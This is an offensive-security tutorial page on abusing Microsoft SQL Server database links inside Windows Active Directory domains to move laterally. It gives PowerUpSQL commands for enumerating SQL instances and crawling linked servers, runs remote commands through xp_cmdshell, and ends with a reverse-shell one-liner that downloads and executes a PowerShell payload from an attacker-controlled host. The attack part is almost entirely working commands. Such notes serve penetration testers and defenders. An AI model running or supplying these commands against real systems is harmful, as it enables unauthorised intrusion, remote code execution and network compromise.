MSSQL Server Trust Abuse
Within Windows domains, plenty of servers deploy MSSQL, often on their own servers with users from other servers often connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement in a domain as domain users can be mapped to database roles.
What we can also take advantage are database links. Often, SQL Servers within a network are accessible to each other and the links between the different databases provide a unique way for us to traverse within the Active Directory network by indirectly being able to execute commands without leaving our current station. It works not only between domain trusts in a forest, but between separate forests as well.
These attacks can also go relatively undetected because of the fact you can execute commands on distant SQL Servers from your own machine.
Enumeration
We can use PowerUPSQL.ps1 to use to enumerate SQL Servers.
Finding Instances From SQL Servers That Have an SPN with the Domain Controller and Discovering Logon Sessions
Get-SQLInstanceDomainFinding Accessible SQL Servers
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -VerboseRetrieve Basic Server and Information From Target SQL Servers For Each Instance
Get-SQLInstanceDomain | Get-SQLServerInfo -VerboseSearching Database Links
Get-SQLServerLink -Instance <sql_server_domain> -Verbose
# Crawling downfield database links from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -VerboseNow We Can Execute Commands
Check the results next to the 'CustomQuery' header
Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"Get a Reverse Shell
Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"Last updated